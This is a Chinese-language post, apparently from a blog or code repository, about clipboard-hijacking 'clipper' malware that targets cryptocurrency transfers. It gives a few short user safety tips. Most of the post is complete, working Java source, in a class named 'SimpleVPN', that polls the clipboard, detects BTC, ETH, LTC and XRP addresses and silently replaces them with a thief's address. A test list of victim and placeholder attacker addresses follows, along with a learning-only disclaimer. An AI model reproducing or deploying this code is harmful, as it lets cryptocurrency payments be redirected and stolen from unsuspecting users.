剪贴板安全正确的使用方式
hefung监控剪贴板劫持用户复制内容!盗刷虚拟货币!教你复现剪贴板病毒!Java如何监控剪贴板?剪贴板可以让你倾家荡产!剪贴板这样使用才是最安全的!最近币圈很多人中招的剪贴板病毒,盗取用户加密货币资产,这个病毒很早就有了,它会自己自动检查用户剪切 复制 的内容,如果你的剪切复制内容里有地址的格式,它就会自动把这地址换成盗窃者的地址。如果你平时不够细心的话,那你就会容易中招。实在是卑鄙无耻下流也。
剪贴板安全正确的使用方式:
1.银行卡号、转账地址、手机号等信息不要一次性复制完,分段复制可以很大程度上避免被窃取。
2.复制密钥、密码等信息在复制前插入几个字符达到混淆真实密码的目的,粘贴完后再删除对应的字符即可。
3.填写收款账号等表单时,转账核对一下有关于钱相关的信息,不要直接就保存了或转账了。
Java监控剪贴板代码(监控复制的内容是否是虚拟货币地址):
java
<span class="token comment">// 监听剪贴板并且替换</span>
<span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">SimpleVPN</span> <span class="token punctuation">{</span>
<span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">Pattern</span> <span class="token constant">BTC_PATTERN</span> <span class="token operator">=</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">Pattern</span> <span class="token constant">ETH_PATTERN</span> <span class="token operator">=</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"0x[a-fA-F0-9]{40}"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">Pattern</span> <span class="token constant">LTC_PATTERN</span> <span class="token operator">=</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">Pattern</span> <span class="token constant">XRP_PATTERN</span> <span class="token operator">=</span> <span class="token class-name">Pattern</span><span class="token punctuation">.</span><span class="token function">compile</span><span class="token punctuation">(</span><span class="token string">"[rX][1-9A-HJ-NP-Za-km-z]{24,34}"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">boolean</span> isUpdatingClipboard <span class="token operator">=</span> <span class="token boolean">false</span><span class="token punctuation">;</span> <span class="token comment">// 解决无限循环问题</span>
<span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token class-name">String</span><span class="token punctuation">[</span><span class="token punctuation">]</span> args<span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token class-name">Clipboard</span> clipboard <span class="token operator">=</span> <span class="token class-name">Toolkit</span><span class="token punctuation">.</span><span class="token function">getDefaultToolkit</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">getSystemClipboard</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Transferable</span> previousContent <span class="token operator">=</span> clipboard<span class="token punctuation">.</span><span class="token function">getContents</span><span class="token punctuation">(</span><span class="token keyword">null</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">while</span> <span class="token punctuation">(</span><span class="token boolean">true</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">try</span> <span class="token punctuation">{</span>
<span class="token class-name">Thread</span><span class="token punctuation">.</span><span class="token function">sleep</span><span class="token punctuation">(</span><span class="token number">1000</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// 每秒检查一次</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>isUpdatingClipboard<span class="token punctuation">)</span> <span class="token punctuation">{</span>
isUpdatingClipboard <span class="token operator">=</span> <span class="token boolean">false</span><span class="token punctuation">;</span> <span class="token comment">// 跳过本次循环,避免检测到自己修改的内容</span>
<span class="token keyword">continue</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token class-name">Transferable</span> currentContent <span class="token operator">=</span> clipboard<span class="token punctuation">.</span><span class="token function">getContents</span><span class="token punctuation">(</span><span class="token keyword">null</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>currentContent <span class="token operator">!=</span> <span class="token keyword">null</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token comment">// **忽略非文本格式的数据**</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token operator">!</span>currentContent<span class="token punctuation">.</span><span class="token function">isDataFlavorSupported</span><span class="token punctuation">(</span><span class="token class-name">DataFlavor</span><span class="token punctuation">.</span>stringFlavor<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token keyword">continue</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token class-name">String</span> newText <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token class-name">String</span><span class="token punctuation">)</span> currentContent<span class="token punctuation">.</span><span class="token function">getTransferData</span><span class="token punctuation">(</span><span class="token class-name">DataFlavor</span><span class="token punctuation">.</span>stringFlavor<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span>previousContent <span class="token operator">==</span> <span class="token keyword">null</span> <span class="token operator">||</span> <span class="token operator">!</span>newText<span class="token punctuation">.</span><span class="token function">equals</span><span class="token punctuation">(</span>previousContent<span class="token punctuation">.</span><span class="token function">getTransferData</span><span class="token punctuation">(</span><span class="token class-name">DataFlavor</span><span class="token punctuation">.</span>stringFlavor<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token class-name">System</span><span class="token punctuation">.</span>err<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">"用户复制了内容: "</span> <span class="token operator">+</span> newText<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token constant">BTC_PATTERN</span><span class="token punctuation">.</span><span class="token function">matcher</span><span class="token punctuation">(</span>newText<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">matches</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token class-name">System</span><span class="token punctuation">.</span>out<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">"检测到比特币(BTC)地址: "</span> <span class="token operator">+</span> newText<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">setClipboardContent</span><span class="token punctuation">(</span><span class="token string">"AAAAA1eP5QGefi2DMPTfTL5SLmv7DivfNa"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// 修改剪贴板内容</span>
<span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token constant">ETH_PATTERN</span><span class="token punctuation">.</span><span class="token function">matcher</span><span class="token punctuation">(</span>newText<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">matches</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token class-name">System</span><span class="token punctuation">.</span>out<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">"检测到以太坊(ETH)地址: "</span> <span class="token operator">+</span> newText<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">setClipboardContent</span><span class="token punctuation">(</span><span class="token string">"AAAA2d35Cc6634C0532925a3b844Bc454e4438f44e"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// 修改剪贴板内容</span>
<span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token constant">LTC_PATTERN</span><span class="token punctuation">.</span><span class="token function">matcher</span><span class="token punctuation">(</span>newText<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">matches</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token class-name">System</span><span class="token punctuation">.</span>out<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">"检测到莱特币(LTC)地址: "</span> <span class="token operator">+</span> newText<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">setClipboardContent</span><span class="token punctuation">(</span><span class="token string">"AAAAx3LhXqP1HYYNRuGH1cXBJHTYTPyxJq"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// 修改剪贴板内容</span>
<span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token constant">XRP_PATTERN</span><span class="token punctuation">.</span><span class="token function">matcher</span><span class="token punctuation">(</span>newText<span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">matches</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token class-name">System</span><span class="token punctuation">.</span>out<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">"检测到瑞波币(XRP)地址: "</span> <span class="token operator">+</span> newText<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token function">setClipboardContent</span><span class="token punctuation">(</span><span class="token string">"AAAAeomae4FXwgQTJp9Rs64Qg9vDiTCdBv"</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// 修改剪贴板内容</span>
<span class="token punctuation">}</span>
previousContent <span class="token operator">=</span> clipboard<span class="token punctuation">.</span><span class="token function">getContents</span><span class="token punctuation">(</span><span class="token keyword">null</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment">// 重新获取剪贴板内容,避免旧数据干扰</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">UnsupportedFlavorException</span> e<span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token class-name">System</span><span class="token punctuation">.</span>err<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">"剪贴板数据格式不支持,跳过: "</span> <span class="token operator">+</span> e<span class="token punctuation">.</span><span class="token function">getMessage</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">IOException</span> e<span class="token punctuation">)</span> <span class="token punctuation">{</span>
<span class="token class-name">System</span><span class="token punctuation">.</span>err<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">"读取剪贴板数据时发生IO异常: "</span> <span class="token operator">+</span> e<span class="token punctuation">.</span><span class="token function">getMessage</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">InterruptedException</span> e<span class="token punctuation">)</span> <span class="token punctuation">{</span>
e<span class="token punctuation">.</span><span class="token function">printStackTrace</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token comment">// 修改剪贴板内容</span>
<span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token function">setClipboardContent</span><span class="token punctuation">(</span><span class="token class-name">String</span> text<span class="token punctuation">)</span> <span class="token keyword">throws</span> <span class="token class-name">InterruptedException</span> <span class="token punctuation">{</span>
isUpdatingClipboard <span class="token operator">=</span> <span class="token boolean">true</span><span class="token punctuation">;</span> <span class="token comment">// 标记为正在修改剪贴板,避免无限循环</span>
<span class="token class-name">StringSelection</span> selection <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">StringSelection</span><span class="token punctuation">(</span>text<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Clipboard</span> clipboard <span class="token operator">=</span> <span class="token class-name">Toolkit</span><span class="token punctuation">.</span><span class="token function">getDefaultToolkit</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">getSystemClipboard</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
clipboard<span class="token punctuation">.</span><span class="token function">setContents</span><span class="token punctuation">(</span>selection<span class="token punctuation">,</span> <span class="token keyword">null</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">Thread</span><span class="token punctuation">.</span><span class="token function">sleep</span><span class="token punctuation">(</span><span class="token number">500</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token class-name">System</span><span class="token punctuation">.</span>err<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">"篡改剪贴板成功,成功修改为: "</span> <span class="token operator">+</span> text<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">}</span>
测试:
假设你要往下面的虚拟货币地址转账
比特币 (BTC) 收款地址: 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa
以太坊 (ETH) 收款地址: 0x742d35Cc6634C0532925a3b844Bc454e4438f44e
莱特币 (LTC) 收款地址: LZ3nx3LhXqP1HYYNRuGH1cXBJHTYTPyxJq
瑞波币 (XRP) 收款地址: rDsbeomae4FXwgQTJp9Rs64Qg9vDiTCdBv
不法分子的虚拟货币地址
比特币 (BTC) 收款地址: AAAAP1eP5QGefi2DMPTfTL5SLmv7DivfNa
以太坊 (ETH) 收款地址: AAAA2d35Cc6634C0532925a3b844Bc454e4438f44e
莱特币 (LTC) 收款地址: AAAAx3LhXqP1HYYNRuGH1cXBJHTYTPyxJq
瑞波币 (XRP) 收款地址: AAAAeomae4FXwgQTJp9Rs64Qg9vDiTCdBv
攻防无绝对,技术无好坏,在非安全的信息时代,众人皆在囚笼之中,关注牛马小试,让你一飞冲天!
- 注:本人不参与任何涉政相关讨论,本人所有平台和内容仅供技术相关学习交流使用。
[!CAUTION]
本仓库所有内容均来自互联网公开内容或本仓库所有者创作,请勿相信资源中的广告,主动联系你的都是骗子,提高智商谨防上当受诈!请勿利用本仓库实施违反任何适用法律法规等犯罪活动!本仓库所有者不对因使用本仓库内容导致的任何后果承担责任!
[!NOTE]